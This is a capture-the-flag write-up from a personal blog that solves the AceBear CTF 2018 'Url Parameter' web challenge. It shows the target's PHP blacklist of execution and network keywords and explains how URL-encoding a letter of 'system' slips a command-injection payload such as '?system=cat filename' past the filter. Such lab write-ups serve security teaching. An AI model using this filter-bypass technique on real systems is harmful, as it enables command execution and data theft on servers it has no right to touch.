Codehead's Corner
Random ramblings on hacking, coding, fighting with infrastructure and general tech
AceBear CTF 2018 - Url Parameter - Web - 100
Posted: 28 Jan 2018 at 03:10 by Codehead


Description: this chall sucks, you should watch VIE vs UZB match. :)
Author: kad96
Website: Link

Visiting the website gave me a blank page. There had to be something more hidden here.


Even though the initial page was blank, looking at the request showed that a 200 OK response had been received from the server, so something was happening, we just weren’t seeing any output.

A quick poke around the URL revealed a robots.txt file which gave the first clue:

# you know de wae ma queen
User-Agent: *
Disallow: /?debug

Visiting provided the PHP source code that is driving the page:

$blacklist = "assert|system|passthru|exec|assert|read|open|eval|`|_|file|dir|\.\.|\/\/|curl|ftp|glob";

if(count($_GET) > 0){
    if(preg_match("/$blacklist/i",$_SERVER["REQUEST_URI"])) die("No no no hackers!!");
    list($key, $val) = each($_GET);

It seems the the page is checking for and blocking directory traversal characters (../) and also preventing command injection by filtering out a bunch of useful PHP keywords.

The last section takes the GET parameters from the URL and helpfully executes the parameter with the value as an argument. It seems like command injection is the way to go, but we need to either find commands that are not blocked, or sneak something past the blacklist filter.

A quick test showed that we were on the right track:

Function not found!!

Initially I played with preg_replace. The idea was to obfuscate the command to pass the checks, modify it into a usable state and execute using the \e option. However, underscores are filtered by the blacklist, removing a whole heap of useful commands.

I built a local instance of the page and tested a few things with the blacklist removed, this showed that a simple:


followed by:

http://localhost/?system=cat filename

would work just fine, as long as I could get past the blacklist.

The space in cat filename bothered me, but the browser filled in a %20 and everything worked just fine. This gave me an idea, would a URL encoded parameter pass the blacklist? The letter ‘s’ is 0x73, so let’s tweak the URL a little:

flag-a-long-name-that-you-wont-know.php index.php robots.txt

That works! Now to dump the file…

Nothing? Did we do something wrong?

Nope, looking at the request with the developer console, we see:

    //here the flag: AceBear{I_did_something_stupid_with_url}


Categories: Hacking CTF

Site powered by Hugo.
Polymer theme by pdevty, tweaked by Codehead